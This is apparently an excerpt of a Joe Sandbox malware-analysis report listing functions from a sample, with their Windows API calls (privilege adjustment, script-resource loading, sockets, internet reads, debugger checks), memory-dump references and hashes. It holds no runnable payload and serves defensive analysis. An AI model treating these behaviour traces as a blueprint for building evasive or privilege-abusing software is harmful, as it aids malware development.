                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                        • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                        • API String ID: 2234035333-3163812486
                                                                                                                                                                        • Opcode ID: 671b7303b70bac56a74d7466e986c92159c886e4baaf7f4755a692354b3ec3d0
                                                                                                                                                                        • Instruction ID: 641d54a019f1f1a1073bb918afe08d008692d1cd46f2ab76f01de3a4a74f012a
                                                                                                                                                                        • Opcode Fuzzy Hash: 671b7303b70bac56a74d7466e986c92159c886e4baaf7f4755a692354b3ec3d0
                                                                                                                                                                        • Instruction Fuzzy Hash: 0101497A6302216BEB5466B8AD8AFBF736D9F08390F110739FD03E20D2DA604C24D591
                                                                                                                                                                        Function 002622AD Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DefDlgProcW.USER32(?,?), ref: 0026233E
                                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00262421
                                                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00262434
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Color$Proc
                                                                                                                                                                        • String ID: (3
                                                                                                                                                                        • API String ID: 929743424-113007392
                                                                                                                                                                        • Opcode ID: 18e8ee541ca5a4ffcbf3cf1ac3a6f86317329fe68580d808b83d0828bdd5323f
                                                                                                                                                                        • Instruction ID: 17c3052e8e286805e0f3710bba4a1addb1a345190c74f45a62565cc776e41b53
                                                                                                                                                                        • Opcode Fuzzy Hash: 18e8ee541ca5a4ffcbf3cf1ac3a6f86317329fe68580d808b83d0828bdd5323f
                                                                                                                                                                        • Instruction Fuzzy Hash: DC8136B0134805FEE229AE3C4C98E7F655EEB43340F15055AF102CA6D5CF999EF58672
                                                                                                                                                                        Function 002D3A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002A56C2,?,?,00000000,00000000), ref: 002D3A1E
                                                                                                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002A56C2,?,?,00000000,00000000), ref: 002D3A35
                                                                                                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,002A56C2,?,?,00000000,00000000,?,?,?,?,?,?,002666CE), ref: 002D3A45
                                                                                                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,002A56C2,?,?,00000000,00000000,?,?,?,?,?,?,002666CE), ref: 002D3A56
                                                                                                                                                                        • LockResource.KERNEL32(002A56C2,?,?,002A56C2,?,?,00000000,00000000,?,?,?,?,?,?,002666CE,?), ref: 002D3A65
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                        • String ID: SCRIPT
                                                                                                                                                                        • API String ID: 3051347437-3967369404
                                                                                                                                                                        • Opcode ID: 75bc412ed1955c2f132f6bf0af563f6a36b696582a6c43dcf0ae728f95026477
                                                                                                                                                                        • Instruction ID: 50eb9db70bf9a8663e22165396a16d3dce9e13b96680af72721009951fbd7533
                                                                                                                                                                        • Opcode Fuzzy Hash: 75bc412ed1955c2f132f6bf0af563f6a36b696582a6c43dcf0ae728f95026477
                                                                                                                                                                        • Instruction Fuzzy Hash: 81113C71201705BFE7218F65EC48F277BBAEBC5B91F14426DB442D6250DB71DD01CAA1
                                                                                                                                                                        Function 002C20AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002C1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002C1916
                                                                                                                                                                          • Part of subcall function 002C1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002C1922
                                                                                                                                                                          • Part of subcall function 002C1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002C1931
                                                                                                                                                                          • Part of subcall function 002C1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002C1938
                                                                                                                                                                          • Part of subcall function 002C1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002C194E
                                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000000,002C1C81), ref: 002C20FB
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 002C2107
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 002C210E
                                                                                                                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 002C2127
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,002C1C81), ref: 002C213B
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 002C2142
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3008561057-0
                                                                                                                                                                        • Opcode ID: 9cc1dfd8fb933acec42ddb63632c591b0125784147d38e22431920cd5d47c5fe
                                                                                                                                                                        • Instruction ID: a46e469053ac11b2b0e8731ca12433a9a82c3f379f99b8f37a14222ead4e3b84
                                                                                                                                                                        • Opcode Fuzzy Hash: 9cc1dfd8fb933acec42ddb63632c591b0125784147d38e22431920cd5d47c5fe
                                                                                                                                                                        • Instruction Fuzzy Hash: CB11DC71520205FFDB108FA4DC09FAF7BAAEF453A6F18412DE94993220CB71A918CB60
                                                                                                                                                                        Function 002DA570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 002DA5BD
                                                                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 002DA6D0
                                                                                                                                                                          • Part of subcall function 002D42B9: GetInputState.USER32 ref: 002D4310
                                                                                                                                                                          • Part of subcall function 002D42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002D43AB
                                                                                                                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 002DA5ED
                                                                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 002DA6BA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                        • API String ID: 1972594611-438819550
                                                                                                                                                                        • Opcode ID: fa802faca85f9c87333612042f736e2e177ed4701d33e93110d40ea3848d742b
                                                                                                                                                                        • Instruction ID: ac958fbd444b39cfe5bb306ab1a96ac42d4a97b38315486254ae1451e7b0db3e
                                                                                                                                                                        • Opcode Fuzzy Hash: fa802faca85f9c87333612042f736e2e177ed4701d33e93110d40ea3848d742b
                                                                                                                                                                        • Instruction Fuzzy Hash: 9841837191120ADFCF15EF64D849EEEBBB8EF05350F144056E805A2291EB70DEA4CFA1
                                                                                                                                                                        Function 002E2263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002E3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 002E3AD7
                                                                                                                                                                          • Part of subcall function 002E3AAB: _wcslen.LIBCMT ref: 002E3AF8
                                                                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002E22BA
                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 002E22E1
                                                                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 002E2338
                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 002E2343
                                                                                                                                                                        • closesocket.WSOCK32(00000000), ref: 002E2372
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1601658205-0
                                                                                                                                                                        • Opcode ID: 52e097406dd25722bf2891fca9d5d8416f350a52a7e70a2cecaf84c1137da008
                                                                                                                                                                        • Instruction ID: fc6aafd7d00b6d1593507813783f1ffdbc8b10b4d0095864d598a1f48706cd29
                                                                                                                                                                        • Opcode Fuzzy Hash: 52e097406dd25722bf2891fca9d5d8416f350a52a7e70a2cecaf84c1137da008
                                                                                                                                                                        • Instruction Fuzzy Hash: DD51B375A50200AFE711AF24C886F2A77A9AF44758F44809CF9465F3C3D671AD92CFA1
                                                                                                                                                                        Function 002F26DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 292994002-0
                                                                                                                                                                        • Opcode ID: ee27f083249a39c7a0faa8672ca70c5f5ec2515e9197aafeddf6c28a6e3afde7
                                                                                                                                                                        • Instruction ID: 3cace3115aa1d9ca842f6e2626eeeeaeb6ea3aac9db97456d7da442ab348559d
                                                                                                                                                                        • Opcode Fuzzy Hash: ee27f083249a39c7a0faa8672ca70c5f5ec2515e9197aafeddf6c28a6e3afde7
                                                                                                                                                                        • Instruction Fuzzy Hash: 4821073571021ACFE710AF26D844B3AFB99EF863A0B198078E949CB351D771EC56CB90
                                                                                                                                                                        Function 002DD889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 002DD8CE
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 002DD92F
                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000), ref: 002DD943
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 234945975-0
                                                                                                                                                                        • Opcode ID: 84307b29e053a750a46f2ed13baa07782319e7eb21fd554fcc5f4a7a79135b6a
                                                                                                                                                                        • Instruction ID: 12dfde41219b2dd411f1144127607e70dcacb617420321bec8515be005b07401
                                                                                                                                                                        • Opcode Fuzzy Hash: 84307b29e053a750a46f2ed13baa07782319e7eb21fd554fcc5f4a7a79135b6a
                                                                                                                                                                        • Instruction Fuzzy Hash: D721A1B1510B06EFE7209F65D858BABB7FCEB40324F10442EE64692241D771EE15DB94
                                                                                                                                                                        Function 002CE472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(?,002A46AC), ref: 002CE482
                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 002CE491
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 002CE4A2
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 002CE4AE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2695905019-0
                                                                                                                                                                        • Opcode ID: ce63c25f5efa32c9e0249f0ae28277b15624c7c7697963be46c7ab7e13bc5159
                                                                                                                                                                        • Instruction ID: 7d04b61a185e4941bbcc85101e3f99455449ab72779b69caad7592bdf36cb2ab
                                                                                                                                                                        • Opcode Fuzzy Hash: ce63c25f5efa32c9e0249f0ae28277b15624c7c7697963be46c7ab7e13bc5159
                                                                                                                                                                        • Instruction Fuzzy Hash: 76F0A030420D105796246B3CBC0D8BB766EAE02335B904759FC36C20E0D77899A596D5
                                                                                                                                                                        Function 002BE5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LocalTime
                                                                                                                                                                        • String ID: %.3d$X64
                                                                                                                                                                        • API String ID: 481472006-1077770165
                                                                                                                                                                        • Opcode ID: f4173eacff3985e1ef83b63234578a7880fbdf409bae403d84d782a45d082a7a
                                                                                                                                                                        • Instruction ID: 24419bf72793f32b909ff19373d8dc4791ceb3349b0269ee3f3bd1fa41484d2b
                                                                                                                                                                        • Opcode Fuzzy Hash: f4173eacff3985e1ef83b63234578a7880fbdf409bae403d84d782a45d082a7a
                                                                                                                                                                        • Instruction Fuzzy Hash: 29D05BB5C38118DADFC0D7909D4CDFD737CBB18380F158462F906D1001E6B09D64AB21
                                                                                                                                                                        Function 00292992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00292A8A
                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00292A94
                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00292AA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                        • Opcode ID: 3aa91d09bab1318b7f427484c860c80440ba74be66f5cfa24fb2975aa5064f9e
                                                                                                                                                                        • Instruction ID: 161d86effc7a5c5c2bd4c846ca4a50e85c8440124ae9f0b43f86a75a71fb719b
                                                                                                                                                                        • Opcode Fuzzy Hash: 3aa91d09bab1318b7f427484c860c80440ba74be66f5cfa24fb2975aa5064f9e
                                                                                                                                                                        • Instruction Fuzzy Hash: FA31D775911229EBCB61DF64D98879CBBB8BF08310F5041EAE80CA6261E7309F95CF45
                                                                                                                                                                        Function 002C2010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0028014B: __CxxThrowException@8.LIBVCRUNTIME ref: 002809D8
                                                                                                                                                                          • Part of subcall function 0028014B: __CxxThrowException@8.LIBVCRUNTIME ref: 002809F5
                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002C205A
                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002C2087
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002C2097
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 577356006-0
                                                                                                                                                                        • Opcode ID: afca18860e6c808a4e40081cf00d41330973363cc1b2e4932c10a546891b2840
                                                                                                                                                                        • Instruction ID: 5c896eeba2b4c58b77eef7602f7e259261ea3cfda3a2e268d2404e0235860d06
                                                                                                                                                                        • Opcode Fuzzy Hash: afca18860e6c808a4e40081cf00d41330973363cc1b2e4932c10a546891b2840
                                                                                                                                                                        • Instruction Fuzzy Hash: 8311BFB2424305EFD718AF54ECCAE6BB7B9EB44760B20852EE04653291DB70BC55CB24
                                                                                                                                                                        Function 00285058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,0028502E,?,003298D8,0000000C,00285185,?,00000002,00000000), ref: 00285079
                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,0028502E,?,003298D8,0000000C,00285185,?,00000002,00000000), ref: 00285080
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00285092
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                        • Opcode ID: bb4f54c633dccacb565dcfcc6a376a0e88b61d2c0e4e471b5133ff23aba74f47
                                                                                                                                                                        • Instruction ID: 2d1e819877a23dbf7f08ced22ffc566d1b6777c9cc5487351cf9cac2d739d3f8
                                                                                                                                                                        • Opcode Fuzzy Hash: bb4f54c633dccacb565dcfcc6a376a0e88b61d2c0e4e471b5133ff23aba74f47
                                                                                                                                                                        • Instruction Fuzzy Hash: 1BE04632411508AFCF217F60ED0CE683B6AEB14391F014064F9098A161DB3AED62CFC0
                                                                                                                                                                        Function 002BE652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 002BE664
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
